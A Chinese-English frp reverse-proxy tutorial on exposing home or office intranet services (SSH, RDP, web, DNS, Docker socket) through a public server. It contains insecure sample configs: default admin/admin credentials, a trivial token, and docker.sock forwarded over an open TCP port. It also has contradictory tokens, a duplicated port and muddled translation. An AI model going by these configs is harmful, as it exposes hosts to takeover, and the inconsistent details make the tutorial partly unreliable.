​中文文档:https://github.com/fatedier/frp/blob/dev/README_zh.md 手机+frp内网穿透搭建随身携带的服务器:https://blog.csdn.net/sinat_27938829/article/details/73604722 软路由 通过 Openwrt 自带的 Frp 插件:https://zhuanlan.zhihu.com/p/367894569 手机搭建个人网站 (KSWEB+TERMUX+FRP内网穿透 ):https://www.jianshu.com/p/9981d27c0350 玩转内外网互通 (Ngrok、钉钉、花生壳、frp ):https://www.it235.com/实用工具/内网穿透/pierce.html

内网穿透工具 — FRP:https://mp.weixin.qq.com/s?__biz=MzI3MTI2NzkxMA==&mid=2247485670&idx=1&sn=df62f2df93f112a7bc0b8d7e843bbc16

关键字:内网穿透域名映射

内网穿透

什么是内网穿透?

内网穿透,又叫 NET 穿透,是计算机用语.用通俗的说法就是你家里的个人电脑,可以直接被外网的人访问.例如你在公司,不通过远程工具,直接也可以访问到家里的电脑.Intranet penetration is to connect the local area network 端口暴露给 公网,Then through the public network, you can access the services of the exposed ports on the LAN

通常实现内网穿透,是通过路由器上端口映射来实现的.但是路由器通常不是每个人都有权限可以访问和设置,而且可能存在多级路由器较为复杂的网络结构.端口映射也无法实现.

Normally our personal computers cannot be accessed by others(有固定 ip 除外!),而且现在固定 ip 资源稀缺,运营商也不会随便给你分配了,个人申请也挺难.

为什么需要内网穿透?就个人而已,需要用到内网穿透的原因:一是方便访问公司的内网环境,不喜欢使用远程工具,挺麻烦的.二是方便把个人电脑上的应用开放到外网进行访问.

1、Frp 介绍

FRP 全名:Fast Reverse Proxy.FRP 是一个使用 Go 语言开发的开源、简洁易用、高性能的内网穿透和反向代理软件,支持 tcp, udp, http, https 等协议.frp 项目官网是:https://github.com/fatedier/frp

使用 frpThe tool has the following advantages:

  • 1. 利用处于内网或防火墙后的机器,对外网环境提供 HTTP 或 HTTPS 服务.
  • 2. 对于 HTTP, HTTPS 服务支持基于域名的虚拟主机,支持自定义域名绑定,使多个域名可以共用一个 80 端口.
  • 3. 利用处于内网或防火墙后的机器,对外网环境提供 TCP 和 UDP 服务,例如在家里通过 SSH 访问处于公司内网环境内的主机.

frp 工作原理

  • 服务端运行,监听一个主端口,等待客户端的连接;
  • 客户端连接到服务端的主端口,同时告诉服务端要监听的端口和转发类型;
  • 服务端fork新的进程监听客户端指定的端口;
  • 外网用户连接到客户端指定的端口,服务端通过和客户端的连接将数据转发到客户端;
  • 客户端进程再将数据转发到本地服务,从而实现内网对外暴露服务的能力.

2、配置教程

想要配置 frp 穿透,First of all, you must have an external network ip ( 即:可以外网访问 ) 的服务器.如果没有,The rest of the tutorial doesn’t have to see.

The configuration tutorial is mainly divided into two parts,

  • 1:服务器端 (外网服务器) 的配置;服务端通常部署在具有公网 IP 的机器上
  • 2:客户端 (内网服务器) 配置.客户端通常部署在需要穿透的内网服务所在的机器上

服务端 (外网服务器 ) 配置

linux 版:

下载地址:https://github.com/fatedier/frp/releases

After downloading, upload it to the server:scp frp_0.39.0_linux_amd64.tar.gz 用户名@服务端ip:~/ This will put it in the home directory of the server..或者执行命令:wget https://github.com/fatedier/frp/releases/download/v0.39.0/frp_0.39.0_linux_amd64.tar.gz If it feels slow,可以使用 mwget 安装:mwget https://github.com/fatedier/frp/releases/download/v0.39.0/frp_0.39.0_linux_amd64.tar.gz

解压 frp 压缩包:tar -zxvf frp_0.39.0_linux_amd64.tar.gz

frp Directory of the file is divided into two parts:

  • frpc The beginning represents 客户端 使用.
  • frps 开头的代表 服务端 使用.
  • .ini 结尾的文件是 frp 的配置文件,file that needs to be modified.

frps_full.ini文件内容:

# [common] is integral section[common]# A literal address or host name for IPv6 must be enclosed# in square brackets, as in "[::1]:80", "[ipv6-host]:http" or "[ipv6-host%zone]:80"# For single "bind_addr" field, no need square brackets, like "bind_addr = ::".bind_addr = 0.0.0.0bind_port = 7000# udp port to help make udp hole to penetrate natbind_udp_port = 7001# udp port used for kcp protocol, it can be same with 'bind_port'# if not set, kcp is disabled in frpskcp_bind_port = 7000# specify which address proxy will listen for, default value is same with bind_addr# proxy_bind_addr = 127.0.0.1# if you want to support virtual host, you must set the http port for listening (optional)# Note: http port and https port can be same with bind_portvhost_http_port = 80vhost_https_port = 443# response header timeout(seconds) for vhost http server, default is 60s# vhost_http_timeout = 60# tcpmux_httpconnect_port specifies the port that the server listens for TCP# HTTP CONNECT requests. If the value is 0, the server will not multiplex TCP# requests on one single port. If it's not - it will listen on this value for# HTTP CONNECT requests. By default, this value is 0.# tcpmux_httpconnect_port = 1337# set dashboard_addr and dashboard_port to view dashboard of frps# dashboard_addr's default value is same with bind_addr# dashboard is available only if dashboard_port is setdashboard_addr = 0.0.0.0dashboard_port = 7500# dashboard user and passwd for basic auth protectdashboard_user = admindashboard_pwd = admin# enable_prometheus will export prometheus metrics on {dashboard_addr}:{dashboard_port} in /metrics api.enable_prometheus = true# dashboard assets directory(only for debug mode)# assets_dir = ./static# console or real logFile path like ./frps.loglog_file = ./frps.log# trace, debug, info, warn, errorlog_level = infolog_max_days = 3# disable log colors when log_file is console, default is falsedisable_log_color = false# DetailedErrorsToClient defines whether to send the specific error (with debug info) to frpc. By default, this value is true.detailed_errors_to_client = true# authentication_method specifies what authentication method to use authenticate frpc with frps.# If "token" is specified - token will be read into login message.# If "oidc" is specified - OIDC (Open ID Connect) token will be issued using OIDC settings. By default, this value is "token".authentication_method = token# authenticate_heartbeats specifies whether to include authentication token in heartbeats sent to frps. By default, this value is false.authenticate_heartbeats = false# AuthenticateNewWorkConns specifies whether to include authentication token in new work connections sent to frps. By default, this value is false.authenticate_new_work_conns = false# auth tokentoken = 12345678# oidc_issuer specifies the issuer to verify OIDC tokens with.# By default, this value is "".oidc_issuer =# oidc_audience specifies the audience OIDC tokens should contain when validated.# By default, this value is "".oidc_audience =# oidc_skip_expiry_check specifies whether to skip checking if the OIDC token is expired.# By default, this value is false.oidc_skip_expiry_check = false# oidc_skip_issuer_check specifies whether to skip checking if the OIDC token's issuer claim matches the issuer specified in OidcIssuer.# By default, this value is false.oidc_skip_issuer_check = false# heartbeat configure, it's not recommended to modify the default value# the default value of heartbeat_timeout is 90. Set negative value to disable it.# heartbeat_timeout = 90# user_conn_timeout configure, it's not recommended to modify the default value# the default value of user_conn_timeout is 10# user_conn_timeout = 10# only allow frpc to bind ports you list, if you set nothing, there won't be any limitallow_ports = 2000-3000,3001,3003,4000-50000# pool_count in each proxy will change to max_pool_count if they exceed the maximum valuemax_pool_count = 5# max ports can be used for each client, default value is 0 means no limitmax_ports_per_client = 0# tls_only specifies whether to only accept TLS-encrypted connections. By default, the value is false.tls_only = false# tls_cert_file = server.crt# tls_key_file = server.key# tls_trusted_ca_file = ca.crt# if subdomain_host is not empty, you can set subdomain when type is http or https in frpc's configure file# when subdomain is test, the host used by routing is test.frps.comsubdomain_host = frps.com# if tcp stream multiplexing is used, default is truetcp_mux = true# specify keep alive interval for tcp mux.# only valid if tcp_mux is true.# tcp_mux_keepalive_interval = 60# custom 404 page for HTTP requests# custom_404_page = /path/to/404.html# specify udp packet size, unit is byte. If not set, the default value is 1500.# This parameter should be same between client and server.# It affects the udp and sudp proxy.udp_packet_size = 1500[plugin.user-manager]addr = 127.0.0.1:9000path = /handlerops = Login[plugin.port-manager]addr = 127.0.0.1:9001path = /handlerops = NewProxy

frpc_full.ini 文件内容

# [common] is integral section[common]# A literal address or host name for IPv6 must be enclosed# in square brackets, as in "[::1]:80", "[ipv6-host]:http" or "[ipv6-host%zone]:80"# For single "server_addr" field, no need square brackets, like "server_addr = ::".server_addr = 0.0.0.0server_port = 7000# if you want to connect frps by http proxy or socks5 proxy or ntlm proxy, you can set http_proxy here or in global environment variables# it only works when protocol is tcp# http_proxy = http://user:passwd@192.168.1.128:8080# http_proxy = socks5://user:passwd@192.168.1.128:1080# http_proxy = ntlm://user:passwd@192.168.1.128:2080# console or real logFile path like ./frpc.loglog_file = ./frpc.log# trace, debug, info, warn, errorlog_level = infolog_max_days = 3# disable log colors when log_file is console, default is falsedisable_log_color = false# for authentication, should be same as your frps.ini# authenticate_heartbeats specifies whether to include authentication token in heartbeats sent to frps. By default, this value is false.authenticate_heartbeats = false# authenticate_new_work_conns specifies whether to include authentication token in new work connections sent to frps. By default, this value is false.authenticate_new_work_conns = false# auth tokentoken = 12345678# oidc_client_id specifies the client ID to use to get a token in OIDC authentication if AuthenticationMethod == "oidc".# By default, this value is "".oidc_client_id =# oidc_client_secret specifies the client secret to use to get a token in OIDC authentication if AuthenticationMethod == "oidc".# By default, this value is "".oidc_client_secret =# oidc_audience specifies the audience of the token in OIDC authentication if AuthenticationMethod == "oidc". By default, this value is "".oidc_audience =# oidc_token_endpoint_url specifies the URL which implements OIDC Token Endpoint.# It will be used to get an OIDC token if AuthenticationMethod == "oidc". By default, this value is "".oidc_token_endpoint_url =# set admin address for control frpc's action by http api such as reloadadmin_addr = 127.0.0.1admin_port = 7400admin_user = adminadmin_pwd = admin# Admin assets directory. By default, these assets are bundled with frpc.# assets_dir = ./static# connections will be established in advance, default value is zeropool_count = 5# if tcp stream multiplexing is used, default is true, it must be same with frpstcp_mux = true# specify keep alive interval for tcp mux.# only valid if tcp_mux is true.# tcp_mux_keepalive_interval = 60# your proxy name will be changed to {user}.{proxy}user = your_name# decide if exit program when first login failed, otherwise continuous relogin to frps# default is truelogin_fail_exit = true# communication protocol used to connect to server# now it supports tcp, kcp and websocket, default is tcpprotocol = tcp# set client binding ip when connect server, default is empty.# only when protocol = tcp or websocket, the value will be used.connect_server_local_ip = 0.0.0.0# if tls_enable is true, frpc will connect frps by tlstls_enable = true# tls_cert_file = client.crt# tls_key_file = client.key# tls_trusted_ca_file = ca.crt# tls_server_name = example.com# specify a dns server, so frpc will use this instead of default one# dns_server = 8.8.8.8# proxy names you want to start seperated by ','# default is empty, means all proxies# start = ssh,dns# heartbeat configure, it's not recommended to modify the default value# The default value of heartbeat_interval is 10 and heartbeat_timeout is 90. Set negative value# to disable it.# heartbeat_interval = 30# heartbeat_timeout = 90# additional meta info for clientmeta_var1 = 123meta_var2 = 234# specify udp packet size, unit is byte. If not set, the default value is 1500.# This parameter should be same between client and server.# It affects the udp and sudp proxy.udp_packet_size = 1500# include other config files for proxies.# includes = ./confd/*.ini# By default, frpc will connect frps with first custom byte if tls is enabled.# If DisableCustomTLSFirstByte is true, frpc will not send that custom byte.disable_custom_tls_first_byte = false# 'ssh' is the unique proxy name# if user in [common] section is not empty, it will be changed to {user}.{proxy} such as 'your_name.ssh'[ssh]# tcp | udp | http | https | stcp | xtcp, default is tcptype = tcplocal_ip = 127.0.0.1local_port = 22# limit bandwidth for this proxy, unit is KB and MBbandwidth_limit = 1MB# true or false, if true, messages between frps and frpc will be encrypted, default is falseuse_encryption = false# if true, message will be compresseduse_compression = false# remote port listen by frpsremote_port = 6001# frps will load balancing connections for proxies in same groupgroup = test_group# group should have same group keygroup_key = 123456# enable health check for the backend service, it support 'tcp' and 'http' now# frpc will connect local service's port to detect it's healthy statushealth_check_type = tcp# health check connection timeouthealth_check_timeout_s = 3# if continuous failed in 3 times, the proxy will be removed from frpshealth_check_max_failed = 3# every 10 seconds will do a health checkhealth_check_interval_s = 10# additional meta info for each proxymeta_var1 = 123meta_var2 = 234[ssh_random]type = tcplocal_ip = 127.0.0.1local_port = 22# if remote_port is 0, frps will assign a random port for youremote_port = 0# if you want to expose multiple ports, add 'range:' prefix to the section name# frpc will generate multiple proxies such as 'tcp_port_6010', 'tcp_port_6011' and so on.[range:tcp_port]type = tcplocal_ip = 127.0.0.1local_port = 6010-6020,6022,6024-6028remote_port = 6010-6020,6022,6024-6028use_encryption = falseuse_compression = false[dns]type = udplocal_ip = 114.114.114.114local_port = 53remote_port = 6002use_encryption = falseuse_compression = false[range:udp_port]type = udplocal_ip = 127.0.0.1local_port = 6010-6020remote_port = 6010-6020use_encryption = falseuse_compression = false# Resolve your domain names to [server_addr] so you can use http://web01.yourdomain.com to browse web01 and http://web02.yourdomain.com to browse web02[web01]type = httplocal_ip = 127.0.0.1local_port = 80use_encryption = falseuse_compression = true# http username and password are safety certification for http protocol# if not set, you can access this custom_domains without certificationhttp_user = adminhttp_pwd = admin# if domain for frps is frps.com, then you can access [web01] proxy by URL http://web01.frps.comsubdomain = web01custom_domains = web01.yourdomain.com# locations is only available for http typelocations = /,/pichost_header_rewrite = example.com# params with prefix "header_" will be used to update http request headersheader_X-From-Where = frphealth_check_type = http# frpc will send a GET http request '/status' to local http service# http service is alive when it return 2xx http response codehealth_check_url = /statushealth_check_interval_s = 10health_check_max_failed = 3health_check_timeout_s = 3[web02]type = httpslocal_ip = 127.0.0.1local_port = 8000use_encryption = falseuse_compression = falsesubdomain = web01custom_domains = web02.yourdomain.com# if not empty, frpc will use proxy protocol to transfer connection info to your local service# v1 or v2 or emptyproxy_protocol_version = v2[plugin_unix_domain_socket]type = tcpremote_port = 6003# if plugin is defined, local_ip and local_port is useless# plugin will handle connections got from frpsplugin = unix_domain_socket# params with prefix "plugin_" that plugin neededplugin_unix_path = /var/run/docker.sock[plugin_http_proxy]type = tcpremote_port = 6004plugin = http_proxyplugin_http_user = abcplugin_http_passwd = abc[plugin_socks5]type = tcpremote_port = 6005plugin = socks5plugin_user = abcplugin_passwd = abc[plugin_static_file]type = tcpremote_port = 6006plugin = static_fileplugin_local_path = /var/www/blogplugin_strip_prefix = staticplugin_http_user = abcplugin_http_passwd = abc[plugin_https2http]type = httpscustom_domains = test.yourdomain.complugin = https2httpplugin_local_addr = 127.0.0.1:80plugin_crt_path = ./server.crtplugin_key_path = ./server.keyplugin_host_header_rewrite = 127.0.0.1plugin_header_X-From-Where = frp[plugin_https2https]type = httpscustom_domains = test.yourdomain.complugin = https2httpsplugin_local_addr = 127.0.0.1:443plugin_crt_path = ./server.crtplugin_key_path = ./server.keyplugin_host_header_rewrite = 127.0.0.1plugin_header_X-From-Where = frp[plugin_http2https]type = httpcustom_domains = test.yourdomain.complugin = http2httpsplugin_local_addr = 127.0.0.1:443plugin_host_header_rewrite = 127.0.0.1plugin_header_X-From-Where = frp[secret_tcp]# If the type is secret tcp, remote_port is useless# Who want to connect local port should deploy another frpc with stcp proxy and role is visitortype = stcp# sk used for authentication for visitorssk = abcdefglocal_ip = 127.0.0.1local_port = 22use_encryption = falseuse_compression = false# user of frpc should be same in both stcp server and stcp visitor[secret_tcp_visitor]# frpc role visitor -> frps -> frpc role serverrole = visitortype = stcp# the server name you want to visitorserver_name = secret_tcpsk = abcdefg# connect this address to visitor stcp serverbind_addr = 127.0.0.1bind_port = 9000use_encryption = falseuse_compression = false[p2p_tcp]type = xtcpsk = abcdefglocal_ip = 127.0.0.1local_port = 22use_encryption = falseuse_compression = false[p2p_tcp_visitor]role = visitortype = xtcpserver_name = p2p_tcpsk = abcdefgbind_addr = 127.0.0.1bind_port = 9001use_encryption = falseuse_compression = false[tcpmuxhttpconnect]type = tcpmuxmultiplexer = httpconnectlocal_ip = 127.0.0.1local_port = 10701custom_domains = tunnel1

进入解压后的目录,打开配置文件:vi frps.ini将文件内容修改为如下:

[common]

bind_port = 7000 # frp 监听的端口,默认是7000,可以改成其他的 token = mytoken_12345 # 授权码,can be changed to more complex,这个token之后在客户端会用到 dashboard_port = 7500 # frp 管理后台端口,请按自己需求更改 dashboard_user = admin # frp 管理后台用户名和密码,请改成自己的 dashboard_pwd = admin enable_prometheus = true

# frp 日志配置 log_file = /var/log/frps.log log_level = info log_max_days = 3

  • bind_portIndicates the port on which the client and server are connected,The client also needs to set the same and consistent(必填)
  • token是用于客户端和服务端连接的口令,The client also needs to set the same and consistent(必填)
  • dashboard_port是服务端仪表板的端口,Server Dashboard Viewfrp服务运行信息.(按需)
  • dashboard_user 和 dashboard_pwd is the username and password used to open the dashboard page login(按需)

启动 frp 服务

sudo mkdir -p /etc/frp sudo cp frps.ini /etc/frp sudo cp frps /usr/bin sudo cp systemd/frps.service /usr/lib/systemd/system/ sudo systemctl enable frps sudo systemctl start frps

If the above commands are executed in sequence without any error,则说明启动成功.

防火墙开放端口

# 添加监听端口 sudo firewall-cmd –permanent –add-port=7000/tcp # 添加管理后台端口 sudo firewall-cmd –permanent –add-port=7500/tcp sudo firewall-cmd –reload

注意:

  • 1:如果是 ubuntu 或者 centos 6,请使用 ufw / iptables Tool release port;
  • 2:7000 和 7500 两个端口分别对应 frps.ini 配置中的 bind_port 和 dashboard_port

Verify that the server started successfully

访问:http://服务器IP:后台管理端口,输入 用户名、密码 可以查看连接状态.如:http://62.244.114.4:7500/,Username and password correspond respectively frps.ini 文件中的 dashboard_user 和dashboard_pwd 登录之后界面如下:

客户端 (内网服务器 )配置

把 frpc Copy the files at the beginning to the intranet server(Is to expose a network port access to the network servers ),

打开配置文件进行配置:vi frpc.ini (注意:不是frps.ini)

将文件内容修改为如下:

# 客户端配置 [common] server_addr = 服务器ip server_port = 7000 # 与frps.ini的bind_port一致 token = 52010 # 与frps.ini的token一致

# 配置ssh服务 [ssh] type = tcp local_ip = 127.0.0.1 local_port = 22 remote_port = 6000 # 这个自定义,之后再ssh连接的时候要用

[ssh2] # Different clients need different names type = tcp local_ip = 127.0.0.1 local_port = 3389 #SSH使用22端口 windows系统使用3389端口 remote_port = 6006 #This port refers to thex.x.x.x:6000Access the forwarding port of the intranet machine

[rdb] type = tcp local_ip = 127.0.0.1 local_port = 3389 remote_port = 6000

# 配置 http 服务,可用于小程序开发、远程调试等,如果没有可以不写下面的 [web] type = http local_ip = 127.0.0.1 local_port = 8080 subdomain = test.hijk.pw # web域名 remote_port = 自定义的远程服务器端口,例如8080

  • server_addr It’s the server’s external networkIP(必填)
  • bind_port Indicates the port on which the client and server are connected,The server also needs to be set and consistent(必填)
  • token 是用于客户端和服务端连接的口令,The server also needs to be set and consistent(必填)
  • [rdb] is a rule name,可自定义
  • type is the forwarding protocol type
  • local_port 是本地应用的端口号,本例子的3389The default port is remote desktop
  • remote_port 是该条规则在服务端开放的端口号,在公司电脑win10computer start typingmstsc,Bring up the remote desktop connection,输入服务器 IP 加 remote_port Remote home computer

注意:[ssh] Such names must be globally unique,even if there are multiple clients,can only be used once,其他的可以用[ssh2]、[ssh3] 等;意思就是说,If you want to configure multiple clients,The other client’s [ssh] 改为[ssh2]、[ssh3] 等,并且 remote_port 也要变,比如 6002,6003 等

防火墙开放端口

sudo firewall-cmd –permanent –add-port=6000/tcp sudo firewall-cmd –permanent –add-port=8080/tcp sudo firewall-cmd –reload

启动客户端:./frpc -c frpc.ini

Test whether penetration is configured successfully

Find another computer on a different network segment,在终端执行:ssh 用户名@服务端ip -p 端口号

这里一定要注意,Here is the server sideip和用户名,The port numberfrpc.ini文件中的remote_port.If you log in successfully,那么,恭喜你,you have learned to usefrcHow to configure intranet penetration!!!

3、frp 应用

ssh 远程访问

由于以上家里的电脑( frp客户端 )安装在win10系统上,使用 3389 Remote desktop possible,对标 linux 系统,Remote access software will be used FinalShell 或 Xshell,因此在 linux Installing the client on the system requires frpc.ini 加上以下内容:

[ssh] type = tcp local_ip = 127.0.0.1 local_port = 22 remote_port = 7001

在 FinalShell 或 Xshell Enter Tencent Cloud Server in IP:7001 加上 linux account password can be accessed

web 服务连接

家里的电脑(frp客户端)开启了一个 web 服务,比如启动 tomcat,Then the client’s configuration filefrpc.ini Need to fill in the following

[web] type = http local_ip = 127.0.0.1 local_port = 8080 custom_domains = www.youdomain.com

custom_domains is to set the domain name,必须要有,www.youdomain.com You can buy the cheapest in Tencent Cloud5块钱一年,域名注册-我的域名-Registered domain name can be purchased,然后解析域名,Put Tencent cloud serverIPAnd a custom domain name binding,To access the Tencent Cloud server in the future, just enter the domain name directly.,such as Baidu,就直接输入 www.baidu.com

然后Company computer browser输入www.youdomain.com:10080 即可(此处的10080is set by the servervhost_http_port),View to home computer(frp客户端)启动的 web 服务

Protected by a password Web 服务

Since all clients share one FRP 服务端的 HTTP 服务端口,anyone who knows your domain name and URL People can access to your deployment in Intranet Web 服务,However, in some scenarios it is necessary to ensure that only limited users can access.

FRP 支持通过 HTTP Basic Auth 来保护你的 Web 服务,Make users need a username and password to access your service.Need to realize this function mainly needs to be in FRP Add user name and password settings to the client’s configuration file.

vim frpc.ini

[web] type = http local_port = 80 custom_domains = mike.hi-linux.com # Set the username for authentication http_user = abc # Set password for authentication http_pwd = abc

这时访问 http://mike.hi-linux.com:8080 这个 URL You need to enter the configured user name and password to access. This feature is currently limited to HTTP 类型的代理.

HTTP 穿透

HTTP 穿透,也就是我们应用层面的通信协议,http协议;穿透它是为了方便我们访问内网的 web 应用,例如我在内网机器,起了一个 tomcat 部署了一个网站,我想让其他人外网的人来访问我,那就需要进行 HTTP 的穿透;

服务端

[common] bind_port = 7000 vhost_http_port = 80 # 将服务器的 80 端口用作 http 协议的通信 vhost_https_port = 443 # 进服务器的 443 端口用作 https 协议通信 privilege_token = token123456789 # frp的认证,对应的客户也需要配置一样,才可以进行通信

客户端

[common] server_addr = 云服务器ip server_port = 7000 privilege_token = token123456789 #frp的认证

[web_http] type=http #通信类型为http local_ip = 127.0.0.1 local_port = 8080 custom_domains = 二级域名/公网ip

[ssh] type = tcp local_ip = 127.0.0.1 local_port = 22 remote_port = 6000

http 的穿透,我们看到服务端和客户端的配置文件都进行了改动,我们重点来看下客户单中的配置;type = http : 这个是因为我们想要创建的隧道是进行 http 通信的,也就是用来访问本地 web 应用;custom_domains = 二级域名/公网ip :这个配置一般使用一个二级域名来配置,用于通过域名来访问你的穿透服务器,如果没有域名,那么我们写上一个服务器的公网 ip 也是可以的,用 ip 的话,在外网访问的时候,就只能通过 ip 进行访问了,效果都一样;

文件访问服务

家里电脑(frp客户端)的frpc.ini添加以下内容

[my_static_file] type = tcp remote_port = 6001 plugin = static_file plugin_local_path = E:\\temp plugin_strip_prefix = static plugin_http_user = abc plugin_http_passwd = 123

​plugin is the required plugin plugin_local_path is the file directory to be exposed to the outside world plugin_strip_prefix 访问urlcarry prefix plugin_http_user 访问账号 plugin_http_passwd 访问密码 在 公司电脑的浏览器输入:http://1.1.1.1:6001/static/ Enter the account password to view the files shared by the home computer,其中1.1.1.1It is from Tencent Cloud ServerIP

综合 配置

frp 内网穿透,可以使用域名,也可使用IP, 一般来讲,Domain name is easy to remember.So if you have a domain name, try to use a domain name,Only use if you don’t have a domain nameIP.由于 web Services are generally used80端口,如果80端口是否被nginx或其它web If the service is occupied,change to another port,如8080,也可使用 nginx 的反向代理实现 frp 服务端与 nginx 共用 80 端口.

frp 实现内网穿透(没有公网IP的利器).以下 frps就是服务器端(server),frpc就是客户端(client).

1.own domain name FRP 配置

# frps.ini服务端配置 [common] bind_addr = 0.0.0.0 bind_port = 7000 privilege_token = abcdefghijk vhost_http_port = 80 vhost_https_port = 443

vhost_http_port = 80 和 vhost_https_port = 443 将服务器的80端口做http,443端口做https The principle is likenginx一样,These two ports can be shared by multiple websites.

#frpc.ini客户端配置 [common] server_addr = 服务端IP server_port = 7000 privilege_token = abcdefghijk

[httpname] type = http local_port = 80 local_ip = 127.0.0.1 custom_domains =www.52help.net

[httpsname] type = https local_port = 443 local_ip = 127.0.0.1 custom_domains =52help.net

这里的www.52help.net52help.netBoth domain names must exist,And in the domain name resolution, resolve the specified domain name tofrps服务端的IP上.

custom_domains = 这里填写你已经解析到frps服务端IP上的域名,自己每个穿透对应服务,都可以绑定一个专属域名用于访问,包括使用tcp和udp协议.

然后就可以通过这个已经自定义域域名访问到自己的对应HTTP服务.

2. 只有IP,No configuration of own domain name

If you don’t have a domain name,但又想使用 FRP Realize intranet penetration to my HTTP 服务

frps.ini 服务端配置# frps.ini[common]bind_addr = 0.0.0.0bind_port = 7000privilege_token = abcdefghijk# frpc.ini客户端配置[common]server_addr = 服务端IPserver_port = 7000privilege_token = abcdefghijk[httpname]type = tcplocal_port = 80local_ip = 127.0.0.1remote_port = 8080然后就可以通过 服务端IP地址:8080 To access the access to the corresponding through service.

给 Web 服务增加自定义二级域名

Use one with multiple people at the same timeFRP服务端实现Web服务时,It is more convenient to use by customizing the second-level domain name.

通过在FRPConfigured in the configuration file of the serversubdomain_hostparameter to enable this feature.之后在FRP客户端的 http、https type of proxy可以不配置custom_domains,而是配置一个subdomain参数.

然后只需要将*.{subdomain_host}解析到FRPThe server where the server is located.之后用户可以通过subdomaindesignate your ownWebSecond-level domain name used by the service,并通过{subdomain}.{subdomain_host}来访问自己的Web服务.

首先我们在FRP服务端配置subdomain_host参数:

$ vim frps.ini[common]subdomain_host = hi-linux.com

其次在FRP客户端配置文件配置subdomain参数:

$ vim frpc.ini[web]type = httplocal_port = 80subdomain = test

Then put the generic domain name *.hi-linux.com 解析到FRPThe server where the server is located的公网IP地址.FRP 服务端 和 FRP After the success of the client is started,通过test.hi-linux.comaccess to the intranetWeb服务.

  • 同一个HTTPHTTPStype of proxycustom_domainssubdomain可以同时配置.

  • 需要注意的是如果FPR服务端配置了subdomain_host,则custom_domains中不能是属于subdomain_host的子域名或者泛域名.

修改 Host Header

通常情况下FRP不会修改转发的任何数据.但有一些后端服务会根据HTTP请求header中的 host 字段来展现不同的网站,例如Nginx的虚拟主机服务,启用 host-header 的修改功能可以动态修改HTTP请求中的 host 字段.

To achieve this function only need to FRP Defined in the client configuration filehost_header_rewrite参数.

$ vim frpc.ini[web]type = httplocal_port = 80custom_domains = test.hi-linux.comhost_header_rewrite = dev.hi-linux.com

原来HTTP请求中的 host 字段test.hi-linux.com转发到后端服务时会被替换为dev.hi-linux.com.

  • 该功能仅限于 HTTP 类型的代理.

URL 路由

FRP支持根据请求的URL路径路由转发到不同的后端服务.To achieve this function can be achieved byFRP客户端配置文件中的locations字段来指定.

$ vim frpc.ini[web01]type = httplocal_port = 80custom_domains = web.hi-linux.comlocations = /[web02]type = httplocal_port = 81custom_domains = web.hi-linux.comlocations = /news,/about

按照上述的示例配置后,web.hi-linux.com这个域名下所有以 /news 以及 /about 作为前缀的URLThe request will be forwarded to the back-end web02 The backend service where the,其余的请求会被转发到 web01 The backend service where the.

  • 目前仅支持最大前缀匹配,Will consider support after regular matching.

通过 UDP 访问内网机器

DNSUsually use query requestsUDP协议,FRPSupport intranetUDPpenetration of services,配置方式和TCP基本一致.here to forward to Google 的DNS查询服务器 8.8.8.8 的UDP端口为例.

首先修改 FRP 客户端配置文件,并增加如下内容:

$ vim frpc.ini[dns]type = udplocal_ip = 8.8.8.8local_port = 53remote_port = 6001
  • Want to forward to Intranet DNS The server only needs to putlocal_ip改成对应 IP 即可.

Second rebootFRP客户端:

$ ./frpc -c ./frpc.ini2018/01/25 14:54:17 [I] [proxy_manager.go:284] proxy removed: []2018/01/25 14:54:17 [I] [proxy_manager.go:294] proxy added: [ssh web dns]2018/01/25 14:54:17 [I] [proxy_manager.go:317] visitor removed: []2018/01/25 14:54:17 [I] [proxy_manager.go:326] visitor added: []2018/01/25 14:54:17 [I] [control.go:240] [33e1de8a771112a6] login to server success, get run id [33e1de8a771112a6], server udp port [0]2018/01/25 14:54:17 [I] [control.go:165] [33e1de8a771112a6] [ssh] start proxy success2018/01/25 14:54:17 [I] [control.go:165] [33e1de8a771112a6] [web] start proxy success2018/01/25 14:54:17 [I] [control.go:165] [33e1de8a771112a6] [dns] start proxy success

最后通过dig命令测试UDPWhether the packet forwarding is successful,expected to returnwww.google.com域名的解析结果:

$ dig @4.3.2.1 -p 6001 www.google.com...;; QUESTION SECTION:;www.google.com. IN A;; ANSWER SECTION:www.google.com. 79 IN A 69.63.184.30...

转发 Unix 域套接字

通过TCP端口访问内网的Unix域套接字,here and on the local machine Docker Daemon 通信为例.

首先修改FRP客户端配置文件,并增加如下内容:

$ vim frpc.ini[unix_domain_socket]type = tcpremote_port = 6002plugin = unix_domain_socketplugin_unix_path = /var/run/docker.sock

这里主要是使用pluginplugin_unix_pathTwo parameters are enabledunix_domain_socketSocket paths corresponding to plugins and configurations.

Second rebootFRP客户端:

$ ./frpc -c ./frpc.ini2018/01/25 15:09:33 [I] [proxy_manager.go:284] proxy removed: []2018/01/25 15:09:33 [I] [proxy_manager.go:294] proxy added: [ssh web dns unix_domain_socket]2018/01/25 15:09:33 [I] [proxy_manager.go:317] visitor removed: []2018/01/25 15:09:33 [I] [proxy_manager.go:326] visitor added: []2018/01/25 15:09:33 [I] [control.go:240] [f6424f0deb8b6ff7] login to server success, get run id [f6424f0deb8b6ff7], server udp port [0]2018/01/25 15:09:33 [I] [control.go:165] [f6424f0deb8b6ff7] [ssh] start proxy success2018/01/25 15:09:33 [I] [control.go:165] [f6424f0deb8b6ff7] [web] start proxy success2018/01/25 15:09:33 [I] [control.go:165] [f6424f0deb8b6ff7] [dns] start proxy success2018/01/25 15:09:33 [I] [control.go:165] [f6424f0deb8b6ff7] [unix_domain_socket] start proxy success

最后通过curl命令查看Dockerversion information for testing:

$ curl http://4.3.2.1:6002/version{"Platform":{"Name":""},"Components":[{"Name":"Engine","Version":"17.12.0-ce","Details":{"ApiVersion":"1.35","Arch":"amd64","BuildTime":"2017-12-27T20:12:29.000000000+00:00","Experimental":"true","GitCommit":"c97c6d6","GoVersion":"go1.9.2","KernelVersion":"4.9.60-linuxkit-aufs","MinAPIVersion":"1.12","Os":"linux"}}],"Version":"17.12.0-ce","ApiVersion":"1.35","MinAPIVersion":"1.12","GitCommit":"c97c6d6","GoVersion":"go1.9.2","Os":"linux","Arch":"amd64","KernelVersion":"4.9.60-linuxkit-aufs","Experimental":true,"BuildTime":"2017-12-27T20:12:29.000000000+00:00"}
  • FRP从 1.5 The version starts to support client-side hot loading of configuration files,No need to restart the client program every time.The specific method is in the followingFRPThe client part thermal loading the configuration file.

FRP 高级进阶

给 FRP 服务端增加一个 Dashboard

通过Dashboard可以方便的查看FRP的状态以及代理统计信息展示,要使用这个功能首先需要在FRPspecified in the server configuration fileDashboard服务使用的端口:

